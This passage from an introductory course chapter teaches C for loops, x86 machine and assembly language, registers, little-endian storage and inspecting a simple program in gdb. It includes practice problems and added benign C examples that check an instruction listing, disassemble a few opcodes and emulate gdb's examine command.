and see that it is true (2 is indeed less than or equal to 5) and we again execute the body of the loop. The screen output is now:

When we finish executing the body of the loop, we update the loop control variable:

    for( count = 1 ; count <= 5 ; count = count + 1 )

and count becomes 3. We then return to the Boolean expression, note that it is true, execute the loop, and update the loop control variable to 4. The loop executes again, and count is then updated to 5. The loop executes again (since 5 is less than or equal to 5) and count is then updated to 6.
When count is updated to 6 the Boolean expression becomes false and we exit the loop. The final screen output is:

Note that in the for loop the initialization is done only once, and we then "bounce back and forth" between the Boolean expression and the update of the loop control variable.

    for( count = 1 ; count <= 5 ; count = count + 1 )

The initialization (count = 1) is done when we first enter the loop and never again repeated; we bounce back and forth between the other two parts (count <= 5 and count = count + 1).

A flowchart for the for loop is shown below:

[Flowchart: Initialization of loop’s control variable (initialization occurs only once!) -> Boolean expression; True -> Body of the loop -> Update of loop’s control variable (the update happens after the body of the loop is performed!) -> back to the Boolean expression; False -> exit the loop]

Practice Problem 3.1
For each of the for loops shown below, state how many times the loop will iterate.
a) for( i = 1 ; i <= 100 ; i = i + 1 )
b) for( i = 3 ; i > 1 ; i = i - 1 )
c) for( i = 7 ; i <= 21 ; i = i + 7 )
Solution: (a) (b) (c)

Practice Problem 3.2
Examine the following C program and describe the expected output.

    #include<stdio.h>
    int main( )
    {
        int count;
        for( count = 1 ; count <= 2 ; count = count + 1 )
        {
            if( count > 1 )
                printf( "Cyber\n" );
            else
                printf( "Fun\n" );
        }
    }

Solution:

2. Machine and Assembly Language

To understand the damage that an adversary can inflict on your host computer, you have to know a little bit about programming, since, after all, a computer will only do what it is told to do, and a computer is told to do things via programs. But the programs—the software—are only half the story. To understand how a program can damage your computer, you have to know how the hardware interacts with the software. We examine the relationship between software and hardware by focusing on hardware that runs the x86 instruction set, the so-called x86 chip. This is by far the most common hardware implementation in PCs and servers. So, now that we know a little bit about software, let's go back to the machine!

2.1. Machine Language

Examine the C program shown below. What does it do?

    #include<stdio.h>
    int main( )
    {
        int x = 7;
        x = 2001;
    }

Suppose we enter this program using nano, and then compile it using gcc. Remember that the gcc compiler converts the source code (which we humans like) to machine language (which the computer likes). The machine language code is written in the specific machine language for the x86 processor, which is the CPU in your computer. The file containing the machine language code (i.e., the executable file) is named a.out. We can run our program by entering: ./a.out

Remember that a CPU can only interpret very simple instructions that have been “hardwired” as electronic circuits on the CPU chip. This set of simple hardwired instructions is termed the instruction set. Each instruction in the CPU’s instruction set has associated with it a unique string of bits that the CPU can interpret. So, compilation converts the source code instructions to the correct bit strings that correspond to instructions from the CPU's instruction set.

You may be wondering: If a computer can only carry out a small number of tasks (the limited number of simple instructions that have been “hardwired” as circuits on the CPU chip), how are computers able to perform complex operations? To gain an insight into the answer, consider that the complete works of Shakespeare, the English translation of the Bible and the US Constitution are all written using 26 letters, a space symbol and a few punctuation symbols. Similarly, massive programs can be built by combining the limited number of machine language instructions in various ways.

An Aside

What is a.out? And why do I need to put a dot and a slash in front of a.out to execute my program?

Since the CPU can only execute machine language instructions, a C program that you write must be converted into a machine language program before it can be executed by the CPU. This conversion is performed by the gcc compiler.
[Figure: my_program.c (C source beginning "#include<stdio.h> int main( ) { int count; ...") -> gcc -> a.out (machine language)]

By default, the compiler gives the name a.out to the file containing the machine language program. When you recompile a program, a new a.out replaces (overwrites) any file named a.out that may already exist in the working directory. To execute the machine language code (i.e., to run your program), you have to specify the relative pathname to the file named a.out. Recall that a single dot (.) can be used as a shorthand for your current working directory. Thus, the relative pathname to your machine language file is ./a.out

Later, you will learn how to change the name of your executable code to a file name of your choosing.

So… what does the machine language program for our simple C program look like? Here is a picture of the machine language code for our program, beginning at the line that says int main( ).[7]

Machine language is supposed to be bits… where are the bits? Recall that we use hexadecimal to represent binary more compactly. The machine language shown above is in hexadecimal. The machine language code is on the right. On the far left are the addresses in main memory where the machine language instructions are stored. The addresses are also presented in hexadecimal. So, let's add headings to our picture:

    address   machine language instruction

[7] Note that the first line of the program, #include<stdio.h>, creates object code too—but this standard program opening produces standard object code. We are primarily interested in the part of the program that we write (which comes after the line int main( )) so we’ll only focus on that.

Remember that any program that you run—MSWORD, Firefox, a video game—must be in main memory. The operating system decides where a program will actually be placed in memory. So, the line that reads

    8048344:  55

means[8] that at memory address 08048344 there exists the machine language instruction 55.
Pictorially:

So, the first instruction listed is 55 (remember, this is all hexadecimal—think of this first instruction as 0x55).

Practice Problem 3.3
How many bits are in an address?
Solution:

Practice Problem 3.4
How many bits are represented by the hexadecimal number 55?
Solution:

And this number 0x55 means… what? If I looked up the x86 instruction set (e.g., at http://sparksandflames.com/files/x86InstructionChart.html) I would see that the instruction 55 means to push a specific specialized CPU variable into a location in memory where the CPU can retrieve it again later.

So, if the first machine code instruction (55) takes one byte, where will the next instruction be located? The answer: At address 08048345. Each byte has its own address, and memory is numbered sequentially. So… why is the third instruction located at address 8048347? Shouldn’t it be 8048346? The instruction at 8048345 (89 e5) is two bytes. So, this instruction uses addresses 8048345 and 8048346. Similarly, we see that the next instruction consumes three bytes, so the following instruction is stored at address 804834a. (Recall, in hexadecimal, the number after 9 is a.)

What would you guess that last machine language instruction (c3) does? If you guessed "finishes the program and returns to the operating system", you are correct!

So, our program residing in main memory is shown below in Figure 3.1. The numbers to the left (e.g., 08048344) are the addresses in main memory. The contents of the boxes show the values stored at the memory locations. So, memory location 08048344 holds the value 0x55.

[8] Notice that in the address listing above, the very top line shows the full address, but subsequent lines do not show the leading zeros.

[Figure 3.1. Memory layout of our machine language program. Columns: Memory Address | Value Stored at this Address]

I’m sure you would agree: Machine language is fun! (Don’t worry… we won’t see a lot of machine language.)

2.2. Processor Registers

The CPU fetches an instruction (like the instruction 0x55 at address 0x08048374 in Figure 3.1), decodes the instruction, and then executes the instruction. After the CPU executes an instruction, it fetches the next instruction. The sequence of steps fetch-decode-execute repeats until the program is finished.

How does the CPU keep track of which instruction it is at in memory? The CPU has some specialized variables that it uses to execute programs. Unlike variables that you declare in, say, a C program, these CPU variables are actually implemented in high-speed hardware called registers. The x86 has 16 of these variables, each already named and each intended for a specific purpose. Each register holds 32 bits.

The most important CPU variable is eip. Memorize this name. This variable is the Instruction Pointer[9]: This variable holds the address of the next instruction the CPU intends to execute. Many text books refer to the instruction pointer as the program counter. These two terms are synonyms. So, if the executable program shown at the top of the prior page is loaded into memory, the address 08048344 is placed in eip.

Let’s add two more registers to our repertoire. You should also memorize these (along with eip):

esp: The CPU reserves a section of memory, called the stack, to store values that the CPU might want to retrieve later. The esp variable is used to store the address of the "top" of the stack. The name esp stands for extended stack pointer, but it is usually just called the stack pointer.

ebp: This variable is called the base pointer. This CPU variable is used to point to the "bottom" of the stack. (To be more precise, we will see later that ebp actually points to the very first address after the bottom of the stack.)

2.3. Assembly Language

Okay, we want to see precisely what is going on in the CPU, but we can’t keep our sanity if we have to look at pictures like this:

This picture shows machine language.
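Before moving on to assembly language, here is an added example (my own code, not from the EC310 notes) that applies the address reasoning of Section 2.1 in C: it parses an address/machine-code listing in the style of Figure 3.1 and checks that each instruction begins at the previous address plus the previous instruction's length in bytes. The listing is constructed (typical 32-bit gcc output for the x = 7; x = 2001; program); only the first three addresses and lengths and the closing c3 come from the notes, the remaining bytes are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed listing in the style of Figure 3.1 (typical 32-bit gcc output
 * for "int x = 7; x = 2001;"). Only the first three addresses/lengths and the
 * final c3 are taken from the notes; the other bytes are this example's own. */
static const char *listing[] = {
    "8048344:\t55",                    /* push ebp                     (1 byte)  */
    "8048345:\t89 e5",                 /* mov ebp,esp                  (2 bytes) */
    "8048347:\t83 ec 10",              /* sub esp,0x10                 (3 bytes) */
    "804834a:\tc7 45 fc 07 00 00 00",  /* mov DWORD PTR [ebp-4],0x7    (x = 7)   */
    "8048351:\tc7 45 fc d1 07 00 00",  /* mov DWORD PTR [ebp-4],0x7d1  (x = 2001)*/
    "8048358:\tc9",                    /* leave                                  */
    "8048359:\tc3",                    /* ret: back to the operating system      */
};
#define NLINES (sizeof listing / sizeof listing[0])

struct insn_loc { unsigned long addr; int nbytes; };

/* Parse one "addr:<tab>b0 b1 ..." line. Returns 0 and fills *out, or -1 if the
 * line is malformed (no address, no bytes, or a byte that is not two hex digits). */
static int parse_line(const char *line, struct insn_loc *out)
{
    char *end;
    unsigned long addr = strtoul(line, &end, 16);
    if (end == line || *end != ':')
        return -1;
    const char *p = end + 1;
    int n = 0;
    for (;;) {
        while (*p == ' ' || *p == '\t')
            p++;
        if (*p == '\0')
            break;
        char *bend;
        long b = strtol(p, &bend, 16);
        if (bend - p != 2 || b < 0 || b > 0xff)
            return -1;
        n++;
        p = bend;
    }
    if (n == 0)
        return -1;
    out->addr = addr;
    out->nbytes = n;
    return 0;
}

/* Walk a listing and check the notes' rule: each byte has its own address, so
 * the next instruction starts at the previous address plus the previous
 * instruction's length. Returns the number of instructions (-1 on a parse
 * error); *total_bytes, *last_addr and *contiguous (1 = every address matched)
 * are filled in. */
int check_listing(const char **lines, size_t nlines, int *total_bytes,
                  unsigned long *last_addr, int *contiguous)
{
    unsigned long expect = 0;
    *total_bytes = 0;
    *last_addr = 0;
    *contiguous = 1;
    for (size_t i = 0; i < nlines; i++) {
        struct insn_loc loc;
        if (parse_line(lines[i], &loc) != 0)
            return -1;
        if (i > 0 && loc.addr != expect)
            *contiguous = 0;
        expect = loc.addr + (unsigned long)loc.nbytes;
        *total_bytes += loc.nbytes;
        *last_addr = loc.addr;
    }
    return (int)nlines;
}

/* The constructed listing above, checked. */
int check_figure_listing(int *total_bytes, unsigned long *last_addr, int *contiguous)
{
    return check_listing(listing, NLINES, total_bytes, last_addr, contiguous);
}

int main(void)
{
    int total, contig;
    unsigned long last;
    int n = check_figure_listing(&total, &last, &contig);
    for (size_t i = 0; i < NLINES; i++)
        printf("%s\n", listing[i]);
    printf("%d instructions, %d bytes, last instruction at %lx, contiguous: %s\n",
           n, total, last, contig ? "yes" : "no");
    return 0;
}
```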
Since we are not computers, machine language isn't exactly intuitive to us. But unless we can get "into" the CPU, we don't really know what is going on. So we have to find a way to deal with the CPU instructions (machine language) without dealing with bits (or hexadecimal). The answer is to use assembly language! Remember that in assembly language, each machine instruction is replaced by an "English-like" word or mnemonic. Looking at the machine code above, we mentioned that the last instruction, c3, finishes main and returns to the code that called it. In assembly language, this instruction is written ret (short for return). There is a one-to-one mapping between assembly language instructions and machine language instructions: an assembler turns each mnemonic into its bytes, and a disassembler (such as the one built into the debugger we will use shortly) turns the bytes back into mnemonics. Thus, assembly language is just an easier way to read machine language.

Our simple program:

#include<stdio.h>
int main( )
{
   int x = 7;
   x = 2001;
}

is shown in assembly language below. For convenience, the machine language is repeated in the middle; the assembly language appears on the right. (The listing has three columns: address, machine language instruction, assembly language instruction.)

(Footnote: The "e" in eip stands for "extended." The original instruction pointer, ip, was 16 bits, but it was later extended to 32 bits; the same goes for esp and ebp.)

Now... you might be looking at the assembly language and thinking: "That's easier???" Well, it will take some getting used to, but you will pick it up fast. For example, what do you think mov means? If you guessed move, you're right. If you're guessing that sub means subtract, right again! And note that we see the CPU variables ebp and esp that we talked about earlier flying around in the assembly code.
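The bookkeeping described above (decode an instruction, learn its length, and so find where the next one starts) is exactly what a disassembler does. The following is an added example written for these notes; it is not part of the original text and not gdb's code. It walks a constructed byte sequence for main (the same instructions as our program, assumed loaded at 0x08048344 as in Figure 3.1, but without the compiler's extra set-up bytes, so the addresses after the third instruction differ from the figure) and prints each instruction's address and mnemonic. It knows only the six opcodes that occur in this program; any other byte stops the walk rather than guessing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed byte sequence (not copied from the real a.out): the
 * instructions of our ch3demo main, assumed loaded at 0x08048344. */
#define MAIN_BASE 0x08048344u
static const uint8_t MAIN_BYTES[] = {
    0x55,                                     /* push ebp                      */
    0x89, 0xe5,                               /* mov  ebp,esp                  */
    0x83, 0xec, 0x10,                         /* sub  esp,0x10                 */
    0xc7, 0x45, 0xfc, 0x07, 0x00, 0x00, 0x00, /* mov  DWORD PTR [ebp-4],0x7    */
    0xc7, 0x45, 0xfc, 0xd1, 0x07, 0x00, 0x00, /* mov  DWORD PTR [ebp-4],0x7d1  */
    0xc9,                                     /* leave                         */
    0xc3,                                     /* ret                           */
};

/* Decode one instruction from our tiny subset.  Writes Intel-syntax text to
 * out and returns the instruction length in bytes, or 0 for an opcode (or
 * operand encoding) this toy does not know.  A real x86 decoder has a table
 * of hundreds of opcodes plus prefix, ModRM, SIB, displacement and
 * immediate rules; the lengths below follow exactly those rules. */
size_t decode_insn(const uint8_t *p, size_t avail, char *out, size_t outlen)
{
    if (avail == 0) return 0;
    switch (p[0]) {
    case 0x55: snprintf(out, outlen, "push ebp"); return 1;
    case 0xc9: snprintf(out, outlen, "leave");    return 1;
    case 0xc3: snprintf(out, outlen, "ret");      return 1;
    case 0x89:                 /* mov r/m32,r32; ModRM e5 = register ebp <- esp */
        if (avail < 2 || p[1] != 0xe5) return 0;
        snprintf(out, outlen, "mov ebp,esp");
        return 2;
    case 0x83:                 /* group-1 r/m32,imm8; ModRM ec = /5 (sub), rm = esp */
        if (avail < 3 || p[1] != 0xec) return 0;
        snprintf(out, outlen, "sub esp,0x%x", (unsigned)p[2]);
        return 3;
    case 0xc7: {               /* mov r/m32,imm32; ModRM 45 = [ebp + disp8] */
        if (avail < 7 || p[1] != 0x45) return 0;
        int8_t disp = (int8_t)p[2];
        /* the immediate is a little-endian 32-bit number: low byte first */
        uint32_t imm = (uint32_t)p[3] | (uint32_t)p[4] << 8 |
                       (uint32_t)p[5] << 16 | (uint32_t)p[6] << 24;
        snprintf(out, outlen, "mov DWORD PTR [ebp%+d],0x%x", disp, imm);
        return 7;
    }
    }
    return 0;
}

/* Walk the code from base, recording the address of every instruction
 * (this is the "where does the next instruction start?" question answered
 * mechanically).  Returns the number of instructions found. */
size_t list_instructions(uint32_t base, const uint8_t *code, size_t n,
                         uint32_t *addrs, size_t max_addrs)
{
    size_t off = 0, count = 0;
    char text[64];
    while (off < n && count < max_addrs) {
        size_t len = decode_insn(code + off, n - off, text, sizeof text);
        if (len == 0) break;                    /* unknown opcode: stop, don't guess */
        addrs[count++] = base + (uint32_t)off;
        printf("0x%08x <main+%zu>:\t%s\n", base + (unsigned)off, off, text);
        off += len;
    }
    return count;
}

int main(void)
{
    uint32_t addrs[16];
    size_t n = list_instructions(MAIN_BASE, MAIN_BYTES, sizeof MAIN_BYTES, addrs, 16);
    printf("%zu instructions in %zu bytes\n", n, sizeof MAIN_BYTES);
    return 0;
}
```

Run it and compare the first four addresses with the reasoning above: 08048344, 08048345, 08048347, 0804834a. Everything after that depends on the set-up bytes gcc really emitted, which this constructed sequence leaves out.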
Some assembly language instructions just specify an operation and do not have any operands, e.g.:

leave
ret

Some specify an operation and a single operand, e.g.:

push ebp

Some specify an operation and two operands, e.g.:

mov ebp, esp
sub esp, eax

For the two-operand instructions, it is important to note that the first operand is the destination and the second operand is the source. (This is the Intel syntax we use throughout; the other common convention, AT&T syntax, reverses the order.) So the instruction mov ebp, esp means "copy the value of esp into ebp," and the instruction sub esp, eax means "subtract the value of eax from esp (so that esp is reduced by the amount in eax)."

Shown below is a cheat sheet of common assembly language instructions. It is suggested that you not grapple with it right now. Rather, refer back to it when you later encounter an assembly language instruction that is unfamiliar.

Instruction: mov (move)
Example: mov DWORD PTR [esp],0x804848a
Explanation: Place the 4-byte value 0x804848a in the memory location whose address is in the esp register. (DWORD PTR means "treat the memory operand as a 4-byte double word.")

Instruction: cmp (compare)
Example: cmp DWORD PTR [ebp],0x4
Explanation: Compare the value stored at the address contained in the ebp register with the value 4. The comparison subtracts the second operand from the first and records only the outcome (equal, less than, greater than) in the CPU's flags; nothing is stored in memory or in ebp. The outcome is consumed by the conditional jump that follows.

Instruction: jne (jump if not equal)
Example: jne 0x804839f
Explanation: Normally follows a comparison (cmp). If the two items in the prior comparison were not equal, jump to the instruction stored at address 0x804839f; otherwise continue with the next instruction in sequence.

Instruction: jle (jump if less than or equal)
Example: jle 0x804839f
Explanation: Normally follows a comparison (cmp). If the first item in the prior comparison was less than or equal to the second item, jump to the instruction stored at address 0x804839f. For example, if the prior comparison was cmp DWORD PTR [ebp],0x4, then if the value stored at the address in ebp is less than or equal to 4 (compared as signed integers), we jump to the instruction stored at address 0x804839f.

Instruction: jmp (jump)
Example: jmp 0x804839f
Explanation: Jump unconditionally to the instruction located at address 0x804839f.

Instruction: inc (increment)
Example: inc DWORD PTR [eax]
Explanation: Add one to the 4-byte value stored at the memory location whose address is in the eax register.

2.4. Program Autopsy: Case 1
Now, to really see what is going on, we can run this program one instruction at a time and, at each step, examine the CPU's special variables (the registers) and any other memory locations we care to. We do this with a debugger: a program that lets you run, pause, and inspect other programs. Here's how to get started:

Step 1. Start up VMware Workstation and navigate to your work directory by entering: cd work. Then, using nano, open a new file named ch3demo.c by entering: nano ch3demo.c. Enter the following program:

#include<stdio.h>
int main( )
{
   int x = 7;
   x = 2001;
}

Compile the program and ensure that it contains no syntax errors (recall that to compile your program you enter gcc ch3demo.c). Then run the program by entering ./a.out. You should see the results shown in the screen capture below.

Wait, what happened? This program is very simple: it merely stores and then changes the value of the variable x in memory. It doesn't get input from the user (scanf), and it doesn't display output either (printf), so there's not much to see "on the outside" when the program is run. But what's happening "on the inside" (in memory)? The debugger will help us figure that out.

Step 2. Start the debugger by entering the following seven commands. Don't type the comments after // ; they are provided only to explain what each command accomplishes. Look at the screen capture below to follow along as you enter the commands; your screen should look the same.

gcc -g ch3demo.c      // The -g option is new: it records extra information (source line numbers, variable names) for the debugger.
gdb -q ./a.out        // gdb is the name of the debugger; -q suppresses its banner. We are running it on the executable file a.out.
set dis intel         // Display assembly code in standard Intel syntax (destination operand first), as used in these notes.
list                  // Repeat the source code for convenience.
disassemble main      // Show the assembly code for main.
break main            // Set a "breakpoint" at main, so that when we run the program it stops at the first line of executable code that follows the line that has main.
run                   // Start executing the program; it runs until it reaches the breakpoint.

So, the program's execution is "frozen" at the first real line of code (the first line of executable code that follows the line that has main). So... where did the program freeze?

Practice Problem 3.5 In the screen capture above, what assembly language instruction did the program stop at, i.e., what is the next instruction that will execute, and where in main memory is this instruction stored? Solution:

You might be wondering: what about all the instructions before this one? Do they matter? They are code the compiler generated to set up memory (the stack frame) for the function; we can safely ignore them for now. Since the last two assembly language instructions, leave and ret, are mop-up operations that undo that set-up (every function compiled this way ends with them), we really only have to concentrate on two lines:

0x08048354 <main+16>:   mov DWORD PTR [ebp-4],0x7
0x0804835b <main+23>:   mov DWORD PTR [ebp-4],0x7d1

(Check: the first mov occupies seven bytes, and 0x08048354 + 7 = 0x0804835b, which is where the second one starts.) What do we make of these two cryptic lines? To find out, we introduce two powerful commands: the info command and the examine command.

Step 3. The info command. To look at the value of a register, we use the info registers (i r) command. For example, to examine the eip register you would enter

i r eip

and to examine the esp register you would enter

i r esp

(Entering i r with no register name shows all of them.)

Practice Problem 3.6 What is the value stored in the eip register? Does this answer make sense? Solution:

Step 4.
The examine command. To examine the value stored at a memory location, we use the examine (x) command. Its format is:

x/<format><size> <location>

- format: x to display in hexadecimal, u to display in (unsigned) decimal, i to display the bytes as an assembly language instruction, s to display them as a string of characters.
- size: how much memory to read as one item. b reads a single byte, h a half-word (two bytes), w a word (four bytes), g a giant (eight bytes). By default (no size letter) the debugger reads four bytes; for i and s it reads whatever the instruction or string occupies.
- location: to see the contents of an address, simply give the address; to see the contents of the address held in a register, give the register name preceded by a dollar sign (e.g., $esp).

So, the command starts with an x followed by a slash. Then we tell the debugger how we would like the memory contents displayed: x for hexadecimal, u for decimal. Right after the display option we can control "how much" data is read: b for a single byte, h for two bytes, w for four bytes, g for eight bytes. Finally we supply the location. To summarize:

Examine Command Cheat Sheet: x/<format><size> <location>
  format:   x = hexadecimal   u = decimal   i = assembly language   s = string
  size:     b = byte   h = half-word (two bytes)   w = word (four bytes)   g = giant (eight bytes)
  location: an address (e.g., 0x08048354), or a register holding an address, preceded by $ (e.g., $esp)

(You can also put a count before the format: x/4xb 0x08048354 shows four consecutive bytes starting at that address.)

If the foregoing paragraphs have you bewildered, do not fear! We will do many examples!

Practice Problem 3.7 Refer to the picture shown in Figure 3.1. What should be printed out by each of the following commands? In each case, enter the command to confirm your answer.
(a) x/xb 0x08048354
(b) x/xb 0x08048355
(c) x/xb 0x08048356
(d) x/xb 0x08048357
Solution: (a) (b) (c) (d)

The above example is depicted in the extract from Figure 3.1 shown below. Recall that when we use b in the examine command, as in x/xb, the b stands for byte. When we issue the command x/xb 0x08048354 we are saying: "Show me the contents of main memory, starting at address 0x08048354, but only going one single byte into memory." If we want to see the contents of memory starting at address 0x08048354 but going two bytes (i.e., a half-word) into memory, we would enter: x/xh 0x08048354.

Practice Problem 3.8 What do you think will be displayed by the command x/xh 0x08048354? Confirm your result. Solution:

The x86 processor stores multi-byte values in so-called little-endian order: the least significant byte is stored at the smallest address. This means that if I have a four-byte quantity, the least significant byte goes in the first address, the second-least-significant byte goes in the next address, and so on. So, to interpret four consecutive bytes as a single number, the bytes must be reversed. The debugger does this for us automatically whenever we ask for a half-word, word, or giant: it reads the bytes at increasing addresses, combines them least-significant-first, and prints the resulting number in the usual most-significant-first way. This is confusing, so let's look at it a little more carefully.

As we mentioned, the program is halted at the instruction at address 08048354. We looked earlier at this section of main memory, exploring it as machine language and as assembly language (the table has two columns: memory address, value stored at this address). The assembly language instruction at address 08048354 is mov DWORD PTR [ebp-4],0x7. It is stored in memory locations 08048354 through 0804835a inclusive, as the seven bytes

c7 45 fc 07 00 00 00

Here is the key point about their order. The first three bytes (c7, 45, fc) are the opcode and the operand encoding, and the CPU reads them in the order they appear. The last four bytes are the constant 0x00000007, and, as with every multi-byte number on the x86, they are stored least significant byte first: 07, then 00, 00, 00. Now suppose you ask the debugger for a word at 08048354 (x/xw 0x08048354). It reads the four bytes c7 45 fc 07 at addresses 08048354, 08048355, 08048356 and 08048357, treats the byte at the lowest address (c7) as the least significant, and so prints 0x07fc45c7: the bytes appear reversed compared with their order in memory. The same rule that puts 07 00 00 00 in memory for the number 7 is what makes the word at 08048354 come out as 0x07fc45c7.

Practice Problem 3.9 What do you think will be displayed by the command x/xw 0x08048354? Confirm your result. Solution:

Step 5. Using the examine command with registers. If we instead want to see the contents of a memory location whose address is in a register, we supply the register name preceded by a dollar sign. So, the command x/xb $eip means the following: "The instruction pointer holds an address (specifically, the address of the next instruction to be executed). Go to that address. Then tell me what is stored at that address, but only proceed one byte into memory please."

Practice Problem 3.10 What do you think will be displayed by the command x/xb $eip? Confirm your result. Solution:

The preceding example is explained by the picture below. The command x/xb $eip means that we should proceed to the memory location that is contained in the instruction pointer, and read off one byte.
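To see how the debugger gets from bytes in memory to the numbers it prints, here is an added example written for these notes (it is not gdb's code and not part of the original text). It emulates x/xb, x/xh, x/xw and x/xg over a small constructed buffer holding the bytes of the two mov instructions at 0x08048354, combining bytes least-significant-first exactly as described above, and separately checks what the real hardware does with an int holding 7.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed: the fourteen bytes at 0x08048354, i.e. the two mov
 * instructions of our program as the disassembly shows them. */
static const uint8_t CODE_AT_08048354[] = {
    0xc7, 0x45, 0xfc, 0x07, 0x00, 0x00, 0x00,   /* mov DWORD PTR [ebp-4],0x7   */
    0xc7, 0x45, 0xfc, 0xd1, 0x07, 0x00, 0x00,   /* mov DWORD PTR [ebp-4],0x7d1 */
};

/* Combine `size` bytes (1, 2, 4 or 8) starting at p the way the x86 and
 * gdb do: the byte at the lowest address is the least significant. */
uint64_t read_le(const uint8_t *p, unsigned size)
{
    uint64_t v = 0;
    for (unsigned i = 0; i < size; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/* Emulate gdb's  x/<count><fmt><size>  over a buffer.  fmt is 'x' (hex) or
 * 'u' (unsigned decimal); size_letter is b, h, w or g.  Each item's value
 * is stored in out[] and a gdb-style line (minus the address label) is
 * built in line.  Returns the number of items examined, 0 on a bad size. */
unsigned examine(const uint8_t *mem, unsigned count, char fmt,
                 char size_letter, uint64_t *out, char *line, size_t linelen)
{
    unsigned size = size_letter == 'b' ? 1 : size_letter == 'h' ? 2 :
                    size_letter == 'w' ? 4 : size_letter == 'g' ? 8 : 0;
    if (size == 0) return 0;
    size_t used = 0;
    line[0] = '\0';
    for (unsigned i = 0; i < count; i++) {
        out[i] = read_le(mem + i * size, size);
        if (used >= linelen) continue;           /* no room left in line */
        int n = (fmt == 'x')
            ? snprintf(line + used, linelen - used, "0x%0*llx\t",
                       (int)(size * 2), (unsigned long long)out[i])
            : snprintf(line + used, linelen - used, "%llu\t",
                       (unsigned long long)out[i]);
        if (n > 0) used += (size_t)n;
    }
    return count;
}

/* Independent of the emulation above: what does this machine really do
 * with an int holding 7?  Returns the byte at the int's lowest address:
 * 7 on a little-endian CPU such as the x86, 0 on a big-endian one. */
int host_first_byte_of_int7(void)
{
    int x = 7;
    unsigned char first;
    memcpy(&first, &x, 1);
    return first;
}

int main(void)
{
    uint64_t v[8];
    char line[128];
    const char *cmds[] = { "x/xb", "x/xh", "x/xw", "x/4xb" };
    unsigned counts[]  = { 1, 1, 1, 4 };
    char sizes[]       = { 'b', 'h', 'w', 'b' };
    for (int i = 0; i < 4; i++) {
        examine(CODE_AT_08048354, counts[i], 'x', sizes[i], v, line, sizeof line);
        printf("%-6s 0x08048354:\t%s\n", cmds[i], line);
    }
    /* the immediate 0x7 starts three bytes in; x/uw there prints 7 */
    examine(CODE_AT_08048354 + 3, 1, 'u', 'w', v, line, sizeof line);
    printf("x/uw   0x08048357:\t%s\n", line);
    printf("first byte of an int 7 on this machine: %d\n", host_first_byte_of_int7());
    return 0;
}
```

The x/xw line is where the "reversal" happens: the emulation reads c7, 45, fc, 07 in address order and builds 0x07fc45c7, which is the value Practice Problem 3.9 asks you to predict.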
Practice Problem 3.11 What do you think will be displayed by the command x/xh $eip? Confirm your result. Solution:

Practice Problem 3.12 What do you think will be displayed by the command x/xw $eip? Confirm your result. Solution:

Practice Problem 3.13 What do you think will be displayed by the command x/i $eip? Confirm your result. Solution:

Step 6. Wonderful... so what does the program actually do? We mentioned that our program has two lines of code we care about:

0x08048354 <main+16>:   mov DWORD PTR [ebp-4],0x7
0x0804835b <main+23>:   mov DWORD PTR [ebp-4],0x7d1

We know that eip contains the first instruction's address: 0x8048354. If we were to execute one instruction and then freeze again, the instruction executed would be mov DWORD PTR [ebp-4],0x7. What does this cryptic instruction do?

For starters, the register ebp is the base pointer, which (you may recall from earlier in this chapter) marks one end of the region of the stack that this function uses for its variables. The stack is a section of memory that our program has available to store any values it needs. The esp register contains the address of the "top" of the stack, and ebp holds the address at the other end of the current function's region; the function's own variables live at addresses just below ebp. The notation [ebp-4] means: compute the address ebp minus 4, and use the memory at that address as the operand; DWORD PTR says the operand is four bytes wide. So this assembly language instruction means, in plain English: store the value 0x7, as the 4-byte quantity 0x00000007, into the four bytes starting at address ebp-4.

A word about "above" and "below": in our stack pictures, addresses increase as you go down the page, so the location ebp-4 is drawn above ebp; numerically, however, ebp-4 is 4 less than ebp. Keep both views in mind.

Let's look at a picture of this end of the stack. Suppose the base pointer contained the address 0xbffff818. Then my program is storing all the information it needs (for example, variables) at addresses just below 0xbffff818 numerically, i.e., above it in the picture. See the picture below. So... if I know the value 0x00000007 is going to be placed 4 bytes below ebp, how does that change the image above?

First, let's figure out the address where the 7 is placed (ebp-4):

  0xbffff818 - 4 = 0xbffff814

That's not so bad. So the 4-byte value 0x00000007 is going to begin at address 0xbffff814. Next, we have to remember the order in which those bytes are stored. (If you're thinking little-endian: GREAT!) Remember, little-endian order means that the least significant byte goes in the first (lowest) address, the second-least-significant byte goes in the next address, and so on. Let's take a look at how that applies to a 4-byte integer. The integer 7 is represented by the following 4 bytes:

  0x 00 00 00 07
     (MSB, the most significant byte, on the left; LSB, the least significant byte, on the right)

In memory, the least significant byte goes in the first address: 07 at 0xbffff814, then 00 at 0xbffff815, 00 at 0xbffff816 and 00 at 0xbffff817. To tie it all together, the "big picture," if you will: the 4 bytes are placed in memory with the least significant byte at address 0xbffff814, as shown below.

That's probably enough pontificating about what will happen when the next instruction is executed. Let's actually execute a single instruction, and then freeze again! Enter the command:

nexti

After you enter this command, you should see:

0x0804835b   5   x = 2001;

Practice Problem 3.14 When you execute an instruction (as you just did when you typed nexti), what happens to the instruction pointer (eip)? Solution:

Practice Problem 3.15 What is the value stored in the eip register? Does this answer make sense? Solution:

We have advanced to the next instruction. The instruction at address 0x0804835b will be the next instruction to execute, as shown on the next page.

Practice Problem 3.16 What should I type to examine memory to see the integer 7 that has just been placed on the stack? (Confirm your result!) Solution:

Practice Problem 3.17 What assembly language instruction is located at 0x0804835b? Solution:

(The listing on the next page has two columns: memory address, value stored at this address.)

Practice Problem 3.18 Sketch what you expect the stack to look like after the instruction at address 0x0804835b is executed.
Solution:

Let's execute a single instruction, and then freeze again! Enter the command:

nexti

Practice Problem 3.19 What two things happen when nexti is entered? Solution: 1. 2.

Practice Problem 3.20 What should you type to examine memory for the hex values you sketched in Practice Problem 3.18? (Confirm your result!) Solution:

Practice Problem 3.21 What should you type to examine memory for the integer 2001? (Confirm your result!) Solution:

Congratulations! You've completed your first program autopsy!

Appendix: Memory Storage Example
This material (Chapter 3) is the toughest chapter in EC310. Midshipmen in the past have struggled with the Chapter 3 material because it introduces a slew of new concepts (the debugger with its many cryptic new commands, assembly code, a first look at registers and memory organization, etc.), all of which are alien to anything you have seen before in any other USNA class. You should rest assured that with some effort the concepts will solidify. The remainder of this chapter contains an extended memory storage example. While this example will not be covered in class, it is recommended that you take time to work through it. Note that in each case that a question is asked, the correct answer follows.

Suppose I have the following variable declarations in a C program:

